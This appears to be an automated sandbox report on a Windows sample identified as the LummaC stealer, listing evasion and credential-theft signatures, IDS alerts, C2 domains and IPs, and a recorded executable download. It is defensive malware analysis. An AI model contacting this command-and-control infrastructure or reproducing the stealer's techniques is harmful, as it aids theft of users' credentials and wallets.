Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1563923
MD5:bc5d8c5f778dff8422725d4ae10dd393
SHA1:be5ec2c6eaf85347ff6b7eb450faadb58a852476
SHA256:073ec2fc8f0451ea19d87dd8ee533ab1f2de836b8c624e9801546e9a0faeb629
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SIDT)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 8100 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BC5D8C5F778DFF8422725D4AE10DD393)
    • chrome.exe (PID: 748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 4228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1900,i,6270560810318321206,4862603060177102708,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 6964 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1988,i,9570468939057985229,18284962801725825015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
{"C2 url": "https://marshal-zhukov.com/api", "Build Version": "LOGS11--LiveTrafic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000003.1524310129.0000000000846000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 8100JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 8100JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:22.381067+010020283713Unknown Traffic192.168.2.1049708104.121.10.34443TCP
          2024-11-27T16:31:24.990177+010020283713Unknown Traffic192.168.2.1049715172.67.160.80443TCP
          2024-11-27T16:31:29.076926+010020283713Unknown Traffic192.168.2.1049724172.67.160.80443TCP
          2024-11-27T16:31:33.171370+010020283713Unknown Traffic192.168.2.1049734172.67.160.80443TCP
          2024-11-27T16:31:36.321557+010020283713Unknown Traffic192.168.2.1049744172.67.160.80443TCP
          2024-11-27T16:31:39.205216+010020283713Unknown Traffic192.168.2.1049754172.67.160.80443TCP
          2024-11-27T16:31:43.891261+010020283713Unknown Traffic192.168.2.1049764172.67.160.80443TCP
          2024-11-27T16:31:47.457733+010020283713Unknown Traffic192.168.2.1049771172.67.160.80443TCP
          2024-11-27T16:31:53.356823+010020283713Unknown Traffic192.168.2.1049783172.67.160.80443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:27.785745+010020546531A Network Trojan was detected192.168.2.1049715172.67.160.80443TCP
          2024-11-27T16:31:31.357112+010020546531A Network Trojan was detected192.168.2.1049724172.67.160.80443TCP
          2024-11-27T16:31:55.747606+010020546531A Network Trojan was detected192.168.2.1049783172.67.160.80443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:27.785745+010020498361A Network Trojan was detected192.168.2.1049715172.67.160.80443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:31.357112+010020498121A Network Trojan was detected192.168.2.1049724172.67.160.80443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:24.990177+010020574161Domain Observed Used for C2 Detected192.168.2.1049715172.67.160.80443TCP
          2024-11-27T16:31:29.076926+010020574161Domain Observed Used for C2 Detected192.168.2.1049724172.67.160.80443TCP
          2024-11-27T16:31:33.171370+010020574161Domain Observed Used for C2 Detected192.168.2.1049734172.67.160.80443TCP
          2024-11-27T16:31:36.321557+010020574161Domain Observed Used for C2 Detected192.168.2.1049744172.67.160.80443TCP
          2024-11-27T16:31:39.205216+010020574161Domain Observed Used for C2 Detected192.168.2.1049754172.67.160.80443TCP
          2024-11-27T16:31:43.891261+010020574161Domain Observed Used for C2 Detected192.168.2.1049764172.67.160.80443TCP
          2024-11-27T16:31:47.457733+010020574161Domain Observed Used for C2 Detected192.168.2.1049771172.67.160.80443TCP
          2024-11-27T16:31:53.356823+010020574161Domain Observed Used for C2 Detected192.168.2.1049783172.67.160.80443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:57.259904+010020197142Potentially Bad Traffic192.168.2.1049792185.215.113.1680TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:18.751542+010020578121Domain Observed Used for C2 Detected192.168.2.10553281.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:19.685731+010020578141Domain Observed Used for C2 Detected192.168.2.10630721.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:18.273613+010020578181Domain Observed Used for C2 Detected192.168.2.10522511.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:19.456494+010020578241Domain Observed Used for C2 Detected192.168.2.10507271.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:23.452892+010020574151Domain Observed Used for C2 Detected192.168.2.10594581.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:19.938235+010020578261Domain Observed Used for C2 Detected192.168.2.10584771.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:18.514044+010020578301Domain Observed Used for C2 Detected192.168.2.10521391.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:20.292125+010020578341Domain Observed Used for C2 Detected192.168.2.10530421.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:18.043771+010020578361Domain Observed Used for C2 Detected192.168.2.10571171.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:19.100815+010020578421Domain Observed Used for C2 Detected192.168.2.10604761.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:45.776518+010020480941Malware Command and Control Activity Detected192.168.2.1049764172.67.160.80443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T16:31:23.292631+010028586661Domain Observed Used for C2 Detected192.168.2.1049708104.121.10.34443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: file.exeAvira: detected
          Source: https://marshal-zhukov.com/apiYBAvira URL Cloud: Label: malware
          Source: https://marshal-zhukov.com/yAvira URL Cloud: Label: malware
          Source: https://marshal-zhukov.com/)Avira URL Cloud: Label: malware
          Source: file.exe.8100.3.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://marshal-zhukov.com/api", "Build Version": "LOGS11--LiveTrafic"}
          Source: file.exeReversingLabs: Detection: 47%
          Source: file.exeJoe Sandbox ML: detected
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 13.107.246.43:443 -> 192.168.2.10:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.10:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49724 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.10:49738 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49764 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49771 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.160.80:443 -> 192.168.2.10:49783 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.43:443 -> 192.168.2.10:49820 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 173.222.162.55:443 -> 192.168.2.10:49853 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.10:49849 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.52.182.8:443 -> 192.168.2.10:49860 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.52.182.8:443 -> 192.168.2.10:49868 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.43:443 -> 192.168.2.10:50078 version: TLS 1.2
          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000003.00000003.1738564661.0000000008160000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000003.00000002.1852612854.0000000006052000.00000040.00000800.00020000.00000000.sdmp

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2057826 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (motion-treesz .sbs) : 192.168.2.10:58477 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057818 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogs-severz .sbs) : 192.168.2.10:52251 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057814 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (disobey-curly .sbs) : 192.168.2.10:63072 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057836 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (property-imper .sbs) : 192.168.2.10:57117 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057834 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (powerful-avoids .sbs) : 192.168.2.10:53042 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057842 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (story-tense-faz .sbs) : 192.168.2.10:60476 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057830 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (occupy-blushi .sbs) : 192.168.2.10:52139 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057812 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (blade-govern .sbs) : 192.168.2.10:55328 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49715 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2057824 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leg-sate-boat .sbs) : 192.168.2.10:50727 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057415 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com) : 192.168.2.10:59458 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49724 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49744 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49764 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49734 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49754 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49771 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49783 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.10:49708 -> 104.121.10.34:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49724 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49724 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49764 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49715 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49715 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49783 -> 172.67.160.80:443
          Source: Malware configuration extractorURLs: https://marshal-zhukov.com/api
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Nov 2024 15:31:57 GMTContent-Type: application/octet-streamContent-Length: 2748416Last-Modified: Wed, 27 Nov 2024 14:39:23 GMTConnection: keep-aliveETag: "67472f1b-29f000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 ac 01 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 7a 6b 74 65 61 62 72 70 00 a0 29 00 00 a0 00 00 00 90 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6c 6a 66 70 75 68 64 00 20 00 00 00 40 2a 00 00 04 00 00 00 ca 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 ce 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
          Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49715 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49724 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49708 -> 104.121.10.34:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49764 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49744 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49734 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49754 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49783 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49771 -> 172.67.160.80:443
          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.10:49792 -> 185.215.113.16:80
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.55
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.55
          Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
          Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
          Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.43
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
